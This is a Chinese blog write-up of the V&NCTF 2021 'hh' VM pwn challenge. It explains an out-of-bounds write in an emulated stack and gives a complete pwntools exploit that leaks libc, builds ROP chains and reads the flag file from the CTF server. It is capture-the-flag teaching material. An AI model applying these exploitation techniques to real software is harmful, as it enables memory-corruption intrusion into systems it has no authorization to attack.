V&NCTF 2021 hh (vmpwn)

最新推荐文章于 2021-12-01 23:00:38 发布
最新推荐文章于 2021-12-01 23:00:38 发布
阅读量518 收藏
点赞数
分类专栏: pwn 文章标签: 堆栈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51868336/article/details/114951644
版权

vm

这道题就是弄了一个vm,然后根据输入的code, 执行相应的操作

我的理解是 相当于在函数栈里伪造一个虚拟栈,又伪造了栈顶指针,然后在这个虚拟栈里你可以进行一些操作,如add(将栈顶两个元素相加),push,pop等,然后有时候由于检验不当,就会造成越界,导致原本操作只是在虚拟栈里变成了可以影响实际函数栈的数据,相当于可以劫持RBP,RET,如果能做到这一步,接下来就是常规的ROP了

这是add指令,stack[r_sp+1000]就相当于栈顶

image-20210317205240286

push指令更好理解

image-20210317205437489

注意到下面这两处

image-20210317205812460

这两个指令意思相差不多,都可以越界写,我们以第一个指令为例子

这里的 v31 = buf[buf_index] ,而buf[buf_index]是我们自己控制的,也就相当于我们可以控制

stack[v31 +999]指向任意地址处,因为c语言中并不会对数组越界进行检查,我们大可以构造如stack[5000] 或者 stack[-5000],就可以通过算偏移得出stack[num]中的num(stack一个元素为四个字节大小),然后stack[r_sp + 1000] 是栈顶数据,我们可以通过push指令给它赋任意值

综上,我们就可以往任意地址写任意数据,通过调试我们就可以得到实际函数栈中的RET地址距stack[]的偏移,从而我们可以覆盖RET,实现ROP,从而get shell或者orw

from pwn import *  
context(os='linux',arch='amd64',log_level='debug')

#r = gdb.debug("./hh",'break main')
#r = process('./hh')
r = remote("node3.buuoj.cn", 27223)  
elf = ELF('./hh')
pop_rdi = 0x4011A3
main = 0x000000000401084
buf = 0x602060 
read = 0x0000000000400710 
pop_rsi_r15 = 0x0000000004011A1
puts_plt = 0x4006f0
puts_got = 0x601FA8
start = 0x400750

def code(cod):
    out1 = b''
    for i in cod:
        out1 += p32(i)
    return out1

def stack(buf):
    out2 = b''
    for i in range(len(buf)):
        out2 += code([ 9 , buf[i]&0xffffffff , 12 , i * 2 + 1007 , 9 , buf[i] >> 32 , 12 , i * 2 + 1008])
    return out2
r.recvuntil("choice :")
r.sendline('1')
r.recvuntil("code:")

payload1 = stack([pop_rdi,puts_got,puts_plt,start])

r.send(payload1)
r.recvuntil("choice :")
r.sendline('2')
r.recv()
libc_base = u64(r.recvline()[:-1].ljust(8, b'\x00')) - 	0x06f6a0
log.info(hex(libc_base))
open_addr = libc_base + 0xF70F0
r.recvuntil("choice :")
r.sendline('1')
r.recvuntil("code:")

payload1 = code([6 , 4 , 0x67616c66, 0]) + stack([pop_rdi, buf+8 , open_addr ,start])

r.send(payload1)
r.recvuntil("choice :")
r.sendline('2')
r.recvuntil("choice :")
r.sendline('1')
r.recvuntil("code:")

payload1 = stack([pop_rdi ,3 , pop_rsi_r15 , buf + 0x500 , 0 , read , start])

r.send(payload1)
r.recvuntil("choice :")
r.sendline('2')
r.recvuntil("choice :")
r.sendline('1')
r.recvuntil("code:")

payload1 = stack([pop_rdi , buf + 0x500 , puts_plt , start])

r.send(payload1)
r.recvuntil("choice :")

r.sendline('2')
r.recv()
r.interactive()

脚本的重点是

def code(cod):
    out1 = b''
    for i in cod:
        out1 += p32(i)
    return out1

def stack(buf):
    out2 = b''
    for i in range(len(buf)):
        out2 += code([ 9 , buf[i]&0xffffffff , 12 , i * 2 + 1007 , 9 , buf[i] >> 32 , 12 , i * 2 + 1008])
    return out2

stack函数中的1007就是调试出来的偏移,9是push指令,12是越界写,由于一次只能写4字节,所以得分两次写

77Pray
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VM pwn入门
weixin_44145820的博客
06-07 2054
VM pwn貌似是最近火起来的一类PWN题。最近打的好几场比赛都出现了VM pwn的题目,正好在BUU上面遇到一道2019年的OGeek中出现的VM pwn题,感觉应该会比较简单,另外听说高校战役里的EasyVM也是偏简单的VM pwn题。本文就主要对这两道题目进行分析。 [OGeek2019 Final]OVM 程序分析 作为VM pwn的第一步就是需要搞清楚指令的格式,操作码和操作数 本题使用的是定长指令,一共32bits,每一个占8bits,但除了操作码能利用完8bits之外,寄存器只占4bits,
VMPWN
Amalllの博客
11-11 1028
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
V&NCTF 2021 write_give_flag
qq_51868336的博客
03-17 330
先看IDA 在这里会申请若干次随机数大小(0x300-0x500)的chunk,然后把flag写进s+16的位置,重点是最后一次循环结束后,虽然free了chunk,但是并没有清空,也就是说flag还在里面 然后是这里 v3的值是read所读取的字符数,当我们读取的字符数为0时,下面puts的就是 noadd[-1],也就是数组越界 我们可以看到noadd上面就是堆指针列表,所以 noadd[-1] 就是 chunk[3] 所以思路就是 先申请三个小chunk,然后再申请一个范围在0x300-0x50
VMPWN入门
Stella_Leo的博客
08-25 675
title: vmpwn author: Ev3r date: 2021-08-19 20:28:14 tags: vmpwn categories: vmpwn vmpwn 当作一个vmpwn的入门了,一些设计基础先不谈了,直接来干货。 vmpwn常见设计 初始化分配模拟寄存器空间 初始化模拟栈空间 初始化分配模拟数据存储(buffer)空间 (data段) 初始化伪OPCODE空间 (text段) 常见流程 输入opcode 有一个分析器,循环分解我们输入的opcode来翻译出汇编指令,多为出.
【八芒星计划】 VM PWN
carol2358的博客
09-01 476
这篇用来记录VM PWN 先申明本篇文章资料来源: https://blog.csdn.net/weixin_44145820/article/details/106600382 https://www.anquanke.com/post/id/208450#h2-1 https://xz.aliyun.com/t/6865 文章目录[OGeek2019 Final]OVM vm pwn最关键的就是逆向相关程序,理解每个指令的作用,漏洞大多数都是数组越界 先介绍一些基础的概念: 1.虚拟机保护技术 所谓
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主题通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
VMP Viewer:显示VMP文件的工具-matlab开发
05-31
这是一个非常初级的工具,用于可视化由 BrainVoyager 生成的 VMP 文件。 与没有 BV 的人共享文件很有用。
vm-pwn入门
蚁景网安学院
09-21 634
亲爱的,关注我吧9/21文章共计2761个词预计阅读7分钟来和我一起阅读吧引言之前一直没去了解过vm-pwn,做一些题目对vm-pwn进行一个大体上的了解,算是入门。前置知识对指令有过了...
一道题目入门VMpwn
qq_40712959的博客
04-16 327
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
2021-NCTF pwn方向题目复现
Amalllの博客
12-01 3462
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
NCTF2021——wp
m0_46296905的博客
11-30 780
文章目录一、REHello せかいShadowbringer鲨鲨的秘密二、MISC做题做累了来玩玩游戏吧Hex酱的秘密花园Hello File Format 一、RE Hello せかい ida反编译,flag明文给出 Shadowbringer 那两个函数是2次base64变异码表的编码,函数反过来换两次码表解码一下就得到flag。 鲨鲨的秘密 SEH里面有反调试(直接nop),还有初始化表需要用到的key(dword_404E58) for循环里面边smc边执行,直接动调分析逻辑 最后写exp如
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3
arttnba3的博客
04-05 1003
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca
NCTF2021 Misc的一点点wp
mumuzi的博客
11-29 5992
在线等一个bot的wp Misc SignIn 跳转链接到了https://nctf.h4ck.fun/challenges/NCTF%7BWelcome_to_NCTF_2021!%7D 所以得到flag NCTF{Welcome_to_NCTF_2021!} Hello File Format 看一下这个bin文件大小为6220800 发现这个大小正好是1920*1080*3 直接联想到了画图咯 from PIL import Image pic = Image.new('RGB',(1920,108
[VNCTF 2021]White_Give_Flag
mcmuyanga的博客
03-16 873
[VNCTF 2021]White_Give_Flag 公开群里有官方wp,简单记录一下自己的复现过程 例行检查,64位程序,保护全开 本地试运行一下,看着像堆 64位ida载入 main() sub_E5A qword_2010120数组中存放着5个字符串,对应菜单的5个选项。而且这个函数执行完后会在chunk中遗留flag的值 sub_F07 读取菜单选项的函数返回的是 read() 的返回值⽽不是 atoi() 的返回值,根据返回值打印 qword_202120 中的字符串
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值